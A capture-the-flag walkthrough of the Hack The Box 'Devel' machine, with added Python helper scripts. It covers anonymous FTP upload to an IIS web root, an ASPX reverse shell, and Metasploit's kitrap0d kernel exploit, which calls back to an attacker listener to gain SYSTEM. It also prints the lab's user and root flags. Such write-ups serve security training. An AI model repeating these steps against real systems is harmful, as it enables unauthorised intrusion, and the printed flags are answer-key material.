HTB-Devel Notes

admin, 2023-10-27 10:07:05


Skills learned

  • Identifying vulnerable services

  • Exploiting weak credentials

  • Basic Windows privilege escalation techniques

Start by scanning the target.

# nmap -sC -sV -T5 -Pn 10.10.10.5
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-20 10:09 CST
Stats: 0:01:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.00% done; ETC: 10:12 (0:01:26 remaining)
Nmap scan report for 10.10.10.5
Host is up (0.32s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 07-20-23  02:24AM                 2779 backup.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
| 07-20-23  05:07AM       <DIR>          PSVIYDJQWP
| 07-20-23  05:10AM       <DIR>          QCBEIJECBS
| 07-20-23  03:07AM                 2764 reverse-shell.aspx
| 03-17-17  05:37PM               184946 welcome.png
|_07-20-23  05:08AM       <DIR>          XCUBJAZTJO
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows



The scan shows two open ports. The ftp-anon script has already listed the FTP root, which means anonymous login is enabled; log in with the anonymous user to confirm.

# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:uu): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49173|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
07-20-23  02:24AM                 2779 backup.aspx
03-17-17  05:37PM                  689 iisstart.htm
07-20-23  05:07AM       <DIR>          PSVIYDJQWP
07-20-23  05:10AM       <DIR>          QCBEIJECBS
07-20-23  03:07AM                 2764 reverse-shell.aspx
03-17-17  05:37PM               184946 welcome.png
07-20-23  05:08AM       <DIR>          XCUBJAZTJO
226 Transfer complete.
ftp>
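The listing above is in the Microsoft FTP Service (IIS) format: MM-DD-YY, HH:MMAM/PM, then either <DIR> or a byte size, then the name. The parser below is an added example and not part of the original post; it embeds the listing above as constructed sample input and pulls out two things worth noticing before uploading anything: which files IIS would hand to a server-side handler rather than serve as static content, and which entries were modified long after the box's own 2017 files (on a shared lab target those are usually other players' leftovers, such as the reverse-shell.aspx already sitting in the root). SERVER_SIDE_EXTS is this example's own list.

```python
"""Parse a Microsoft FTP Service (IIS) LIST reply and triage its entries."""
import re
from dataclasses import dataclass
from datetime import datetime

# One Microsoft FTP Service LIST line: "MM-DD-YY  HH:MMAM|PM  <DIR>|size  name"
_LINE_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?P<kind><DIR>|\d+)\s+(?P<name>.+?)\s*$"
)

# Extensions IIS maps to ASP.NET / classic ASP handlers (this example's own list):
# a file with one of these in the web root is code that runs on the server.
SERVER_SIDE_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".svc", ".cshtml"}


@dataclass(frozen=True)
class Entry:
    name: str
    is_dir: bool
    size: int
    mtime: datetime


def parse_ms_ftp_listing(text):
    """Return one Entry per directory line; FTP reply chatter (1xx/2xx) is skipped."""
    entries = []
    for raw in text.splitlines():
        m = _LINE_RE.match(raw.strip())
        if not m:
            continue
        is_dir = m["kind"] == "<DIR>"
        entries.append(Entry(
            name=m["name"],
            is_dir=is_dir,
            size=0 if is_dir else int(m["kind"]),
            mtime=datetime.strptime(f"{m['date']} {m['time']}", "%m-%d-%y %I:%M%p"),
        ))
    return entries


def server_side_files(entries):
    """Names of files IIS would execute instead of serving as static content."""
    return sorted(
        e.name for e in entries
        if not e.is_dir and any(e.name.lower().endswith(x) for x in SERVER_SIDE_EXTS)
    )


def newer_than(entries, cutoff):
    """Entries modified after `cutoff`: a quick way to separate leftovers from the box's own files."""
    return sorted(e.name for e in entries if e.mtime > cutoff)


# Constructed sample input: the directory listing shown in the walkthrough above.
SAMPLE_LISTING = """\
229 Entering Extended Passive Mode (|||49173|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
07-20-23  02:24AM                 2779 backup.aspx
03-17-17  05:37PM                  689 iisstart.htm
07-20-23  05:07AM       <DIR>          PSVIYDJQWP
07-20-23  05:10AM       <DIR>          QCBEIJECBS
07-20-23  03:07AM                 2764 reverse-shell.aspx
03-17-17  05:37PM               184946 welcome.png
07-20-23  05:08AM       <DIR>          XCUBJAZTJO
226 Transfer complete.
"""

if __name__ == "__main__":
    ents = parse_ms_ftp_listing(SAMPLE_LISTING)
    print("server-side code in the web root:", server_side_files(ents))
    print("modified after the box's oldest file:", newer_than(ents, ents[0].mtime))
```

Run it against a saved `ls` transcript to see at a glance whether the root already holds executable files and what was dropped there recently; both matter when deciding what name to give your own upload.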


The login succeeds. The root holds IIS files (aspnet_client, iisstart.htm, welcome.png), so this is presumably the IIS web root; try uploading a file to see whether anonymous has write access.

ftp> put 43809.txt
local: 43809.txt remote: 43809.txt
229 Entering Extended Passive Mode (|||49177|)
125 Data connection already open; Transfer starting.
100% |****************************************************************************************************************************************************************|  9260        7.00 MiB/s    --:-- ETA
226 Transfer complete.
9260 bytes sent in 00:00 (14.40 KiB/s)
ftp>


Uploads work. Now open port 80 in a browser and request the file that was just uploaded by name.


The file is served back over HTTP, so the anonymous account has read and write access to the IIS web root and anything written there is reachable from the web server. The next step is to upload a web shell and catch a reverse connection. A PHP-format shell was uploaded first, but it turned out to have been deleted.
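A way to perform the same "FTP root is the web root" check without leaving a shell behind, as an added example that is not from the original post: upload a throwaway .txt marker with a random name and random body over anonymous FTP, fetch it over HTTP, compare the bodies, and delete the marker whether or not it was served. The transports are injected so the probe logic can be exercised offline; the real ones use only ftplib and urllib from the standard library. The default host 10.10.10.5 and the probe-<hex>.txt naming are this example's choices, and it assumes the FTP root maps onto http://<host>/.

```python
"""Confirm that an anonymous-writable FTP root is the IIS web root.

A .txt marker is used on purpose: IIS serves it as static content, so nothing
executes on the target, and a random name plus random body rules out clobbering
an existing file or matching a cached/default page by accident.
"""
import ftplib
import io
import secrets
import urllib.error
import urllib.request


def ftp_transport(host, user="anonymous", password="anonymous@"):
    """Real transport: (put, delete) closures over a single ftplib session."""
    ftp = ftplib.FTP(host, timeout=15)
    ftp.login(user, password)

    def put(name, data):
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))

    def delete(name):
        ftp.delete(name)

    return put, delete


def http_get(url):
    """Real transport: response body bytes, or None on any HTTP/connection error."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read()
    except (urllib.error.URLError, OSError):
        return None


def probe_webroot(base_url, put, get, delete):
    """True if a file written through `put` is served at base_url/<name>.

    The marker is removed in every path (served, not found, transport error)
    so the check leaves no trace in the web root.
    """
    name = f"probe-{secrets.token_hex(6)}.txt"   # example's own naming scheme
    body = secrets.token_hex(16).encode()
    put(name, body)
    try:
        served = get(f"{base_url.rstrip('/')}/{name}")
        return served is not None and body in served
    finally:
        try:
            delete(name)
        except Exception:
            pass  # best-effort cleanup; the probe result is still reported


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.5"   # assumed target
    put, delete = ftp_transport(host)
    print("FTP root is served by IIS:", probe_webroot(f"http://{host}", put, http_get, delete))
```

Only after this returns True is it worth uploading something IIS will execute; the body comparison, not just a 200 status, is what distinguishes a real hit from a server that answers every path with its default page.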


PHP files may be filtered, so try an ASPX shell instead. This is the better fit anyway: IIS 7.5 runs .aspx natively through the ASP.NET handler, whereas .php is only executed if a PHP handler (FastCGI) has been configured, which a default IIS install does not have.


The shell comes back and runs as the IIS user, so the next step is privilege escalation. After entering the shell, the working directory is c:\windows\system32\inetsrv.


The working directory is c:\windows\system32\inetsrv, where the IIS user has no write permission, so change to c:\windows\TEMP first: this is a Meterpreter session, and some of Metasploit's Windows privilege-escalation modules need to write a file to the target. The session was identified earlier as x86 Windows (the suggester only collects modules matching the session's architecture, so check sysinfo if in doubt), so run the local_exploit_suggester module to enumerate candidate escalations.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 186 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.5 - Valid modules for session 1:
============================

 #   Name                                                            Potentially Vulnerable?  Check Result
 -   ----                                                            -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                        Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/ms10_015_kitrap0d                         Yes                      The service is running, but could not be validated.
 3   exploit/windows/local/ms10_092_schelevator                      Yes                      The service is running, but could not be validated.
 4   exploit/windows/local/ms13_053_schlamperei                      Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms13_081_track_popup_menu                 Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/ms14_058_track_popup_menu                 Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms15_004_tswbproxy                        Yes                      The service is running, but could not be validated.
 8   exploit/windows/local/ms15_051_client_copy_image                Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ms16_016_webdav                           Yes                      The service is running, but could not be validated.
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc   Yes                      The service is running, but could not be validated.
 11  exploit/windows/local/ms16_075_reflection                       Yes                      The target appears to be vulnerable.
 12  exploit/windows/local/ms16_075_reflection_juicy                 Yes                      The target appears to be vulnerable.
 13  exploit/windows/local/ntusermndragover                          Yes                      The target appears to be vulnerable.
 14  exploit/windows/local/ppr_flatten_rec                           Yes                      The target appears to be vulnerable.
 15  exploit/windows/local/adobe_sandbox_adobecollabsync             No                       Cannot reliably check exploitability.
 16  exploit/windows/local/agnitum_outpost_acs                       No                       The target is not exploitable.
 17  exploit/windows/local/always_install_elevated                   No                       The target is not exploitable.


With this many candidates, start with the first one listed, exploit/windows/local/bypassuac_eventvwr.


That module fails because the IIS user is not in the local Administrators group: a UAC bypass only turns an already-administrative but filtered token into a high-integrity one, so it has nothing to elevate for a service or application-pool account. Switch to exploit/windows/local/ms10_015_kitrap0d, a kernel privilege escalation that does not depend on group membership.
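The wasted run above is avoidable: a UAC bypass cannot help a token that is not in BUILTIN\Administrators, and that is visible from `whoami /groups` before any module is launched. The triage helper below is an added example and not part of the original post. It parses the suggester's `[+]` lines shown above (embedded as sample input), drops bypassuac_* modules when the Administrators SID S-1-5-32-544 is absent from the group list, and orders the rest by how much the module's own check could confirm. The SAMPLE_GROUPS_APPPOOL text is a constructed `whoami /groups` output for an app-pool identity, not captured from this box. Note the caveat it also illustrates: kitrap0d's check only reports "could not be validated", so it ranks below the "appears to be vulnerable" entries, yet it is the one that worked; the ranking is a prioritisation aid, not a verdict.

```python
"""Triage local_exploit_suggester output against the session's group membership."""
import re

# BUILTIN\Administrators has the same well-known SID on every Windows host.
ADMINISTRATORS_SID = "S-1-5-32-544"

# "[+] 10.10.10.5 - exploit/windows/local/foo: The target appears to be vulnerable."
_HIT_RE = re.compile(r"^\[\+\]\s+\S+\s+-\s+(?P<module>exploit/\S+?):\s+(?P<result>.+?)\s*$")

# How much the module's check() could actually confirm (higher is better).
_SCORE = {
    "the target appears to be vulnerable.": 2,
    "the service is running, but could not be validated.": 1,
}


def parse_suggester(text):
    """[(module, check result)] in the order the suggester printed them."""
    hits = []
    for line in text.splitlines():
        m = _HIT_RE.match(line.strip())
        if m:
            hits.append((m["module"], m["result"]))
    return hits


def is_local_admin(whoami_groups_text):
    """True if `whoami /groups` output lists BUILTIN\\Administrators (matched by SID, not name)."""
    return ADMINISTRATORS_SID in whoami_groups_text


def triage(suggester_text, whoami_groups_text):
    """Ordered [(module, score)]; UAC bypasses are removed when the token is not an admin."""
    admin = is_local_admin(whoami_groups_text)
    ranked = []
    for module, result in parse_suggester(suggester_text):
        if "bypassuac" in module and not admin:
            continue  # nothing to elevate: UAC bypass needs an admin token to begin with
        ranked.append((module, _SCORE.get(result.lower(), 0)))
    ranked.sort(key=lambda t: -t[1])   # stable: keeps suggester order within a score band
    return ranked


# Sample input: the [+] lines from the suggester run in the walkthrough above.
SAMPLE_SUGGESTER = """\
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
"""

# Constructed `whoami /groups` output for an IIS application-pool identity (not from this box).
SAMPLE_GROUPS_APPPOOL = """\
GROUP INFORMATION
-----------------
Group Name               Type             SID          Attributes
Everyone                 Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users            Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\\IIS_IUSRS        Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\SERVICE     Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
"""

if __name__ == "__main__":
    for module, score in triage(SAMPLE_SUGGESTER, SAMPLE_GROUPS_APPPOOL):
        print(score, module)
```

Feed it the suggester transcript and the output of `whoami /groups` from the shell; modules it removes are not exploitable from that token no matter what the suggester's check says.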

msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0
LHOST => 10.10.14.13
msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 3484 launched.
[*] Reflectively injecting the DLL into 3484...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.13:4444 -> 10.10.10.5:49185) at 2023-07-20 11:07:31 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


The new session runs as NT AUTHORITY\SYSTEM, so both the user flag and the root flag can be read.

user flag: bea0bc15edb5724527ff82fe17e2113d

root flag: 1853a1ab16f22c3fab3add344514206c

C:\Users\Administrator\Desktop>type root.txt
type root.txt
1853a1ab16f22c3fab3add344514206c

C:\Users\Administrator\Desktop>type C:\Users\babis\Desktop\user.txt
type C:\Users\babis\Desktop\user.txt
bea0bc15edb5724527ff82fe17e2113d

C:\Users\Administrator\Desktop>



Originally published on the WeChat public account "Jiyou too beautiful": HTB-Devel笔记

Reprints should keep the link to this article (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/2150831.html
